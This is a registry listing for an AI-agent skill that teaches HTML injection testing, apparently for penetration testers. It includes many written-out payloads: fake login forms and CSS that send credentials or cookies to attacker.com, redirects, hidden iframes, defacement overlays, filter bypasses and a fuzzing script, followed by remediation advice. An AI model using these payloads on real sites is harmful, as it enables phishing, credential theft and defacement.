{"id":"f79fc1af-e196-4b52-a767-c18919322a69","shortId":"uKuPxs","kind":"skill","title":"html-injection-testing","tagline":"Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# HTML Injection Testing\n\n## Purpose\n\nIdentify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.\n\n## Prerequisites\n\n### Required Tools\n- Web browser with developer tools\n- Burp Suite or OWASP ZAP\n- Tamper Data or similar proxy\n- cURL for testing payloads\n\n### Required Knowledge\n- HTML fundamentals\n- HTTP request/response structure\n- Web application input handling\n- Difference between HTML injection and XSS\n\n## Outputs and Deliverables\n\n1. **Vulnerability Report** - Identified injection points\n2. **Exploitation Proof** - Demonstrated content manipulation\n3. **Impact Assessment** - Potential phishing and defacement risks\n4. **Remediation Guidance** - Input validation recommendations\n\n## Core Workflow\n\n### Phase 1: Understanding HTML Injection\n\nHTML injection occurs when user input is reflected in web pages without proper sanitization:\n\n```html\n<!-- Vulnerable code example -->\n<div>\n    Welcome, <?php echo $_GET['name']; ?>\n</div>\n\n<!-- Attack input -->\n?name=<h1>Injected Content</h1>\n\n<!-- Rendered output -->\n<div>\n    Welcome, <h1>Injected Content</h1>\n</div>\n```\n\nKey differences from XSS:\n- HTML injection: Only HTML tags are rendered\n- XSS: JavaScript code is executed\n- HTML injection is often stepping stone to XSS\n\nAttack goals:\n- Modify website appearance (defacement)\n- Create fake login forms (phishing)\n- Inject malicious links\n- Display misleading content\n\n### Phase 2: Identifying Injection Points\n\nMap application for potential injection surfaces:\n\n```\n1. Search bars and search results\n2. Comment sections\n3. User profile fields\n4. Contact forms and feedback\n5. Registration forms\n6. URL parameters reflected on page\n7. Error messages\n8. Page titles and headers\n9. Hidden form fields\n10. Cookie values reflected on page\n```\n\nCommon vulnerable parameters:\n```\n?name=\n?user=\n?search=\n?query=\n?message=\n?title=\n?content=\n?redirect=\n?url=\n?page=\n```\n\n### Phase 3: Basic HTML Injection Testing\n\nTest with simple HTML tags:\n\n```html\n<!-- Basic text formatting -->\n<h1>Test Injection</h1>\n<b>Bold Text</b>\n<i>Italic Text</i>\n<u>Underlined Text</u>\n<font color=\"red\">Red Text</font>\n\n<!-- Structural elements -->\n<div style=\"background:red;color:white;padding:10px\">Injected DIV</div>\n<p>Injected paragraph</p>\n<br><br><br>Line breaks\n\n<!-- Links -->\n<a href=\"http://attacker.com\">Click Here</a>\n<a href=\"http://attacker.com\">Legitimate Link</a>\n\n<!-- Images -->\n<img src=\"http://attacker.com/image.png\">\n<img src=\"x\" onerror=\"alert(1)\">  <!-- XSS attempt -->\n```\n\nTesting workflow:\n```bash\n# Test basic injection\ncurl \"http://target.com/search?q=<h1>Test</h1>\"\n\n# Check if HTML renders in response\ncurl -s \"http://target.com/search?q=<b>Bold</b>\" | grep -i \"bold\"\n\n# Test in URL-encoded form\ncurl \"http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E\"\n```\n\n### Phase 4: Types of HTML Injection\n\n#### Stored HTML Injection\n\nPayload persists in database:\n\n```html\n<!-- Profile bio injection -->\nName: John Doe\nBio: <div style=\"position:absolute;top:0;left:0;width:100%;height:100%;background:white;\">\n     <h1>Site Under Maintenance</h1>\n     <p>Please login at <a href=\"http://attacker.com/login\">portal.company.com</a></p>\n     </div>\n\n<!-- Comment injection -->\nGreat article!\n<form action=\"http://attacker.com/steal\" method=\"POST\">\n    <input name=\"username\" placeholder=\"Session expired. Enter username:\">\n    <input name=\"password\" type=\"password\" placeholder=\"Password:\">\n    <input type=\"submit\" value=\"Login\">\n</form>\n```\n\n#### Reflected GET Injection\n\nPayload in URL parameters:\n\n```html\n<!-- URL injection -->\nhttp://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action=\"http://attacker.com/steal\">\n\n<!-- Search result injection -->\nhttp://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>\n```\n\n#### Reflected POST Injection\n\nPayload in POST data:\n\n```bash\n# POST injection test\ncurl -X POST -d \"comment=<div style='color:red'>Malicious Content</div>\" \\\n     http://target.com/submit\n\n# Form field injection\ncurl -X POST -d \"name=<script>alert(1)</script>&email=test@test.com\" \\\n     http://target.com/register\n```\n\n#### URL-Based Injection\n\nInject into displayed URLs:\n\n```html\n<!-- If URL is displayed on page -->\nhttp://target.com/page/<h1>Injected</h1>\n\n<!-- Path-based injection -->\nhttp://target.com/users/<img src=x>/profile\n```\n\n### Phase 5: Phishing Attack Construction\n\nCreate convincing phishing forms:\n\n```html\n<!-- Fake login form overlay -->\n<div style=\"position:fixed;top:0;left:0;width:100%;height:100%;\n            background:white;z-index:9999;padding:50px;\">\n    <h2>Session Expired</h2>\n    <p>Your session has expired. Please log in again.</p>\n    <form action=\"http://attacker.com/capture\" method=\"POST\">\n        <label>Username:</label><br>\n        <input type=\"text\" name=\"username\" style=\"width:200px;\"><br><br>\n        <label>Password:</label><br>\n        <input type=\"password\" name=\"password\" style=\"width:200px;\"><br><br>\n        <input type=\"submit\" value=\"Login\">\n    </form>\n</div>\n\n<!-- Hidden credential stealer -->\n<style>\n    input { background: url('http://attacker.com/log?data=') }\n</style>\n<form action=\"http://attacker.com/steal\" method=\"POST\">\n    <input name=\"user\" placeholder=\"Verify your username\">\n    <input name=\"pass\" type=\"password\" placeholder=\"Verify your password\">\n    <button>Verify</button>\n</form>\n```\n\nURL-encoded phishing link:\n```\nhttp://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E\n```\n\n### Phase 6: Defacement Payloads\n\nWebsite appearance manipulation:\n\n```html\n<!-- Full page overlay -->\n<div style=\"position:fixed;top:0;left:0;width:100%;height:100%;\n            background:#000;color:#0f0;z-index:9999;\n            display:flex;justify-content:center;align-items:center;\">\n    <h1>HACKED BY SECURITY TESTER</h1>\n</div>\n\n<!-- Content replacement -->\n<style>body{display:none}</style>\n<body style=\"display:block !important\">\n    <h1>This site has been compromised</h1>\n</body>\n\n<!-- Image injection -->\n<img src=\"http://attacker.com/defaced.jpg\" \n     style=\"position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999\">\n\n<!-- Marquee injection (visible movement) -->\n<marquee behavior=\"alternate\" style=\"font-size:50px;color:red;\">\n    SECURITY VULNERABILITY DETECTED\n</marquee>\n```\n\n### Phase 7: Advanced Injection Techniques\n\n#### CSS Injection\n\n```html\n<!-- Style injection -->\n<style>\n    body { background: url('http://attacker.com/track?cookie='+document.cookie) }\n    .content { display: none }\n    .fake-content { display: block }\n</style>\n\n<!-- Inline style injection -->\n<div style=\"background:url('http://attacker.com/log')\">Content</div>\n```\n\n#### Meta Tag Injection\n\n```html\n<!-- Redirect via meta refresh -->\n<meta http-equiv=\"refresh\" content=\"0;url=http://attacker.com/phish\">\n\n<!-- CSP bypass attempt -->\n<meta http-equiv=\"Content-Security-Policy\" content=\"default-src *\">\n```\n\n#### Form Action Override\n\n```html\n<!-- Hijack existing form -->\n<form action=\"http://attacker.com/steal\">\n\n<!-- If form already exists, add input -->\n<input type=\"hidden\" name=\"extra\" value=\"data\">\n</form>\n```\n\n#### iframe Injection\n\n```html\n<!-- Embed external content -->\n<iframe src=\"http://attacker.com/malicious\" width=\"100%\" height=\"500\"></iframe>\n\n<!-- Invisible tracking iframe -->\n<iframe src=\"http://attacker.com/track\" style=\"display:none\"></iframe>\n```\n\n### Phase 8: Bypass Techniques\n\nEvade basic filters:\n\n```html\n<!-- Case variations -->\n<H1>Test</H1>\n<ScRiPt>alert(1)</ScRiPt>\n\n<!-- Encoding variations -->\n&#60;h1&#62;Encoded&#60;/h1&#62;\n%3Ch1%3EURL%20Encoded%3C%2Fh1%3E\n\n<!-- Tag splitting -->\n<h\n1>Split Tag</h1>\n\n<!-- Null bytes -->\n<h1%00>Null Byte</h1>\n\n<!-- Double encoding -->\n%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E\n\n<!-- Unicode encoding -->\n\\u003ch1\\u003eUnicode\\u003c/h1\\u003e\n\n<!-- Attribute-based -->\n<div onmouseover=\"alert(1)\">Hover me</div>\n<img src=x onerror=alert(1)>\n```\n\n### Phase 9: Automated Testing\n\n#### Using Burp Suite\n\n```\n1. Capture request with potential injection point\n2. Send to Intruder\n3. Mark parameter value as payload position\n4. Load HTML injection wordlist\n5. Start attack\n6. Filter responses for rendered HTML\n7. Manually verify successful injections\n```\n\n#### Using OWASP ZAP\n\n```\n1. Spider the target application\n2. Active Scan with HTML injection rules\n3. Review Alerts for injection findings\n4. Validate findings manually\n```\n\n#### Custom Fuzzing Script\n\n```python\n#!/usr/bin/env python3\nimport requests\nimport urllib.parse\n\ntarget = \"http://target.com/search\"\nparam = \"q\"\n\npayloads = [\n    \"<h1>Test</h1>\",\n    \"<b>Bold</b>\",\n    \"<script>alert(1)</script>\",\n    \"<img src=x onerror=alert(1)>\",\n    \"<a href='http://evil.com'>Click</a>\",\n    \"<div style='color:red'>Styled</div>\",\n    \"<marquee>Moving</marquee>\",\n    \"<iframe src='http://evil.com'></iframe>\",\n]\n\nfor payload in payloads:\n    encoded = urllib.parse.quote(payload)\n    url = f\"{target}?{param}={encoded}\"\n    \n    try:\n        response = requests.get(url, timeout=5)\n        if payload.lower() in response.text.lower():\n            print(f\"[+] Possible injection: {payload}\")\n        elif \"<h1>\" in response.text or \"<b>\" in response.text:\n            print(f\"[?] Partial reflection: {payload}\")\n    except Exception as e:\n        print(f\"[-] Error: {e}\")\n```\n\n### Phase 10: Prevention and Remediation\n\nSecure coding practices:\n\n```php\n// PHP: Escape output\necho htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');\n\n// PHP: Strip tags\necho strip_tags($user_input);\n\n// PHP: Allow specific tags only\necho strip_tags($user_input, '<p><b><i>');\n```\n\n```python\n# Python: HTML escape\nfrom html import escape\nsafe_output = escape(user_input)\n\n# Python Flask: Auto-escaping\n{{ user_input }}  # Jinja2 escapes by default\n{{ user_input | safe }}  # Marks as safe (dangerous!)\n```\n\n```javascript\n// JavaScript: Text content (safe)\nelement.textContent = userInput;\n\n// JavaScript: innerHTML (dangerous!)\nelement.innerHTML = userInput;  // Vulnerable!\n\n// JavaScript: Sanitize\nconst clean = DOMPurify.sanitize(userInput);\nelement.innerHTML = clean;\n```\n\nServer-side protections:\n- Input validation (whitelist allowed characters)\n- Output encoding (context-aware escaping)\n- Content Security Policy (CSP) headers\n- Web Application Firewall (WAF) rules\n\n## Quick Reference\n\n### Common Test Payloads\n\n| Payload | Purpose |\n|---------|---------|\n| `<h1>Test</h1>` | Basic rendering test |\n| `<b>Bold</b>` | Simple formatting |\n| `<a href=\"evil.com\">Link</a>` | Link injection |\n| `<img src=x>` | Image tag test |\n| `<div style=\"color:red\">` | Style injection |\n| `<form action=\"evil.com\">` | Form hijacking |\n\n### Injection Contexts\n\n| Context | Test Approach |\n|---------|---------------|\n| URL parameter | `?param=<h1>test</h1>` |\n| Form field | POST with HTML payload |\n| Cookie value | Inject via document.cookie |\n| HTTP header | Inject in Referer/User-Agent |\n| File upload | HTML file with malicious content |\n\n### Encoding Types\n\n| Type | Example |\n|------|---------|\n| URL encoding | `%3Ch1%3E` = `<h1>` |\n| HTML entities | `&#60;h1&#62;` = `<h1>` |\n| Double encoding | `%253C` = `<` |\n| Unicode | `\\u003c` = `<` |\n\n## Constraints and Limitations\n\n### Attack Limitations\n- Modern browsers may sanitize some injections\n- CSP can prevent inline styles and scripts\n- WAFs may block common payloads\n- Some applications escape output properly\n\n### Testing Considerations\n- Distinguish between HTML injection and XSS\n- Verify visual impact in browser\n- Test in multiple browsers\n- Check for stored vs reflected\n\n### Severity Assessment\n- Lower severity than XSS (no script execution)\n- Higher impact when combined with phishing\n- Consider defacement/reputation damage\n- Evaluate credential theft potential\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| HTML not rendering | Check if output HTML-encoded; try encoding variations; verify HTML context |\n| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags |\n| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["html","injection","testing","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-html-injection-testing","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/html-injection-testing","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34768 github stars · SKILL.md body (12,896 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-23T18:51:28.680Z","embedding":null,"createdAt":"2026-04-18T21:38:39.912Z","updatedAt":"2026-04-23T18:51:28.680Z","lastSeenAt":"2026-04-23T18:51:28.680Z","tsv":"'-8':754 '/h1':561 '/page/':473 '/page?msg=%3cdiv%20style%3d%22position%3afixed%3btop%3a0%3bleft%3a0%3bwidth%3a100%25%3bheight%3a100%25%3bbackground%3awhite%3bz-index%3a9999%3bpadding%3a50px%3b%22%3e%3ch2%3esession%20expired%3c%2fh2%3e%3cform%20action%3d%22http%3a%2f%2fattacker.com%2fcapture%22%3e%3cinput%20name%3d%22user%22%20placeholder%3d%22username%22%3e%3cinput%20name%3d%22pass%22%20type%3d%22password%22%3e%3cbutton%3elogin%3c%2fbutton%3e%3c%2fform%3e%3c%2fdiv%3e':509 '/profile':478 '/register':461 '/search':674 '/search?q=':348,360,422 '/search?q=%3ch1%3etest%3c%2fh1%3e':374 '/steal':419 '/submit':448 '/users/':477 '/usr/bin/env':665 '/welcome?name=':412 '00':571 '1':138,167,249,591,599,639,685 '10':288,736 '2':144,239,255,606,644 '20account':424 '20action':416 '20admin':414 '20been':426 '20compromised':427 '20encoded':564 '20has':425 '2520encoded':576 '252fh1':578 '253c':577,919 '253ch1':574 '253e':579 '253edouble':575 '2fh1':566 '3':150,258,308,610,651 '3c':565 '3ch1':562,912 '3e':567,913 '3eurl':563 '4':158,262,376,617,657 '5':267,480,622,706 '6':270,511,625 '7':276,531,631 '8':279,551 '9':284,593 'action':544,1053 'activ':645 'advanc':532 'alert':590,653,684 'allow':12,68,764,832,1034 'appear':29,85,225,515 'applic':21,77,126,244,643,846,946,1047 'approach':878 'articl':401 'assess':50,152,973 'attack':13,25,69,81,221,482,624,925 'attacker.com':418 'attacker.com/steal':417 'author':40,48 'auto':789 'auto-escap':788 'autom':594 'awar':838 'bar':251 'base':464 'bash':341,435 'basic':309,343,555,858 'bio':392 'block':942 'bold':321,361,364,679,861 'break':334 'browser':100,928,962,966 'burp':104,597 'bypass':552 'byte':573,1022 'captur':600 'charact':833 'check':350,967,1000 'clean':820,824 'click':335,686 'code':210,741 'combin':984 'comment':256,443 'common':294,852,943 'compromis':526 'consid':987 'consider':951 'const':819 'constraint':922 'construct':483 'contact':263 'content':18,74,148,193,196,237,303,445,538,807,840,905 'context':837,875,876,1011 'context-awar':836 'control':54 'convinc':485 'cooki':289,889 'core':164 'creat':30,86,227,484 'credenti':36,92,991 'csp':843,933 'css':535 'curl':114,345,356,371,439,452 'custom':661 'd':442,455 'damag':989 'danger':803,813 'data':110,434 'databas':387 'defac':156,226,512 'defacement/reputation':988 'default':796 'defens':51 'deliver':137 'demonstr':147 'describ':1054 'detect':529 'develop':102 'differ':129,198 'display':235,468 'distinguish':952 'div':330 'document.cookie':893 'doe':391 'dompurify.sanitize':821 'doubl':917 'e':730,734 'echo':188,747,758,768 'educ':55 'element.innerhtml':814,823 'element.textcontent':809 'elif':716 'email':457 'enabl':24,80 'encod':369,504,560,693,700,835,906,911,918,1005,1007,1015 'ent':751 'entiti':915 'environ':56 'error':277,733 'escap':745,776,780,783,790,794,839,947 'evad':554 'evalu':990 'exampl':909 'except':727,728 'execut':212,980,1049 'expir':490,494 'exploit':7,63,145 'f':697,712,723,732 'fake':228 'feedback':266 'field':261,287,450,884 'file':899,902 'filter':556,626,1031 'find':656,659 'firewal':847 'flask':787 'form':39,95,230,264,269,286,370,415,449,487,543,872,883,1037 'format':863 'fundament':121 'fuzz':662 'get':189,403 'goal':222 'great':400 'grep':362 'guidanc':160 'h1':559,570,916 'hack':518 'handl':128 'header':283,844,895 'hidden':285 'higher':981 'hijack':873 'hover':584 'html':2,8,17,57,64,73,120,131,169,171,185,201,204,213,310,316,318,352,379,382,388,409,470,488,517,537,542,546,549,557,619,630,648,775,778,887,901,914,954,997,1004,1010,1028,1033 'html-encod':1003 'html-injection-test':1 'htmlspecialchar':748 'http':122,894 'identifi':5,61,141,240 'ifram':547 'imag':867 'img':586,680 'impact':151,960,982 'import':667,669,779 'inject':3,9,15,38,58,65,71,94,132,142,170,172,192,195,202,214,232,241,247,311,320,329,331,344,380,383,404,430,437,451,465,466,474,533,536,541,548,604,620,635,649,655,714,866,871,874,891,896,932,955 'inlin':936 'innerhtml':812 'input':127,161,176,750,762,772,785,792,798,829 'intrud':609 'issu':995 'ital':323 'javascript':209,804,805,811,817 'jinja2':793 'john':390 'js':1030 'key':197 'knowledg':119 'legitim':337 'leverag':1035 'limit':924,926 'line':333 'link':234,338,506,864,865 'load':618 'log':496 'login':229,397 'lower':974 'mainten':395 'malici':16,72,233,444,904 'manipul':149,516 'manual':632,660 'map':243 'mark':611,800 'may':929,941 'messag':278,301 'meta':539,1038 'mislead':236 'modern':927 'modifi':27,83,223 'move':688 'multipl':965 'name':190,191,297,389,456 'nest':1023 'null':572,1021 'occur':173 'often':216 'onerror':589,683 'output':135,746,782,834,948,1002 'overrid':545 'overview':1057 'owasp':107,637 'page':28,32,84,88,181,275,280,293,306 'paragraph':332 'param':675,699,881 'paramet':272,296,408,612,880 'partial':724 'password':500 'payload':117,384,405,431,513,615,677,690,692,695,715,726,854,855,888,944,1012 'payload.lower':708 'persist':385 'phase':166,238,307,375,479,510,530,550,592,735 'phish':31,87,154,231,481,486,505,986,1036 'php':187,743,744,755,763 'pleas':396,495 'point':143,242,605 'polici':842 'portal.company.com':399 'posit':616 'possibl':713 'post':429,433,436,441,454,885 'potenti':153,246,603,993 'practic':742 'prerequisit':96 'prevent':737,935 'print':711,722,731 'profil':260 'proof':146 'proper':183,949 'protect':828 'proxi':113 'purpos':60,856 'python':664,773,774,786 'python3':666 'q':676 'queri':300 'quick':850 'quot':752 'recommend':163 'red':327 'redirect':304,1040 'refer':851 'referer/user-agent':898 'reflect':178,273,291,402,428,725,971 'refresh':1039 'registr':268 'remedi':159,739 'render':207,353,629,859,999 'report':140 'request':601,668 'request/response':123 'requests.get':703 'requir':97,118 'respons':355,627,702 'response.text':718,721 'response.text.lower':710 'result':254 'review':652 'risk':157 'rule':650,849 'safe':781,799,802,808 'sanit':184,818,930 'scan':646 'script':663,939,979 'search':250,253,299 'section':257 'secur':49,520,527,740,841 'send':607 'server':826 'server-sid':825 'session':489,492 'sever':972,975 'side':827 'similar':112 'simpl':315,862 'site':393,523 'skill':45,1045 'skill-html-injection-testing' 'solut':996 'source-sickn33' 'specif':765 'spider':640 'split':568,1019 'src':587,681 'start':623 'steal':34,90 'step':217 'stone':218 'store':381,969 'strip':756,759,769,1013 'structur':124 'style':687,870,937 'success':634 'suit':105,598 'surfac':248 'tag':205,317,540,569,757,760,766,770,868,1018,1024 'tamper':109 'target':642,671,698 'target.com':347,359,373,411,421,447,460,472,476,508,673 'target.com/page/':471 'target.com/page?msg=%3cdiv%20style%3d%22position%3afixed%3btop%3a0%3bleft%3a0%3bwidth%3a100%25%3bheight%3a100%25%3bbackground%3awhite%3bz-index%3a9999%3bpadding%3a50px%3b%22%3e%3ch2%3esession%20expired%3c%2fh2%3e%3cform%20action%3d%22http%3a%2f%2fattacker.com%2fcapture%22%3e%3cinput%20name%3d%22user%22%20placeholder%3d%22username%22%3e%3cinput%20name%3d%22pass%22%20type%3d%22password%22%3e%3cbutton%3elogin%3c%2fbutton%3e%3c%2fform%3e%3c%2fdiv%3e':507 'target.com/register':459 'target.com/search':672 'target.com/search?q=':346,358,420 'target.com/search?q=%3ch1%3etest%3c%2fh1%3e':372 'target.com/submit':446 'target.com/users/':475 'target.com/welcome?name=':410 'techniqu':534,553 'test':4,59,116,312,313,319,339,342,349,365,438,558,595,678,853,857,860,869,877,882,950,963,1020 'test@test.com':458 'tester':521 'text':322,324,326,328,806 'theft':992 'timeout':705 'titl':281,302 'tool':98,103 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'tri':701,1006,1017 'troubleshoot':994 'type':377,907,908 'u003c':921 'u003c/h1':582 'u003ch1':580 'u003e':583 'u003eunicode':581 'underlin':325 'understand':168 'unicod':920 'upload':900 'url':271,305,368,407,463,469,503,696,704,879,910 'url-bas':462 'url-encod':367,502 'urllib.parse':670 'urllib.parse.quote':694 'use':41,43,596,636,1014,1043 'user':35,91,175,259,298,749,761,771,784,791,797 'userinput':810,815,822 'usernam':499 'utf':753 'valid':52,162,658,830 'valu':290,613,890 'variat':1008,1016 'verifi':501,633,958,1009 'via':892 'visual':959 'vs':970 'vulner':10,23,66,79,139,295,528,816 'waf':848,940 'web':20,76,99,125,180,845 'websit':224,514 'welcom':186,194,413 'whitelist':831 'without':182 'wordlist':621 'work':1027 'workflow':165,340,1051 'x':440,453,588,682 'xss':134,200,208,220,957,977,1025 'zap':108,638","prices":[{"id":"e4d4bf27-2b53-4dbe-87b6-4fdf4be96aae","listingId":"f79fc1af-e196-4b52-a767-c18919322a69","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:38:39.912Z"}],"sources":[{"listingId":"f79fc1af-e196-4b52-a767-c18919322a69","source":"github","sourceId":"sickn33/antigravity-awesome-skills/html-injection-testing","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/html-injection-testing","isPrimary":false,"firstSeenAt":"2026-04-18T21:38:39.912Z","lastSeenAt":"2026-04-23T18:51:28.680Z"}],"details":{"listingId":"f79fc1af-e196-4b52-a767-c18919322a69","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"html-injection-testing","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34768,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-23T06:41:03Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"c99eaf5987bf0890be35c0a7423d32aa55f91871","skill_md_path":"skills/html-injection-testing/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/html-injection-testing"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"html-injection-testing","description":"Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/html-injection-testing"},"updatedAt":"2026-04-23T18:51:28.680Z"}}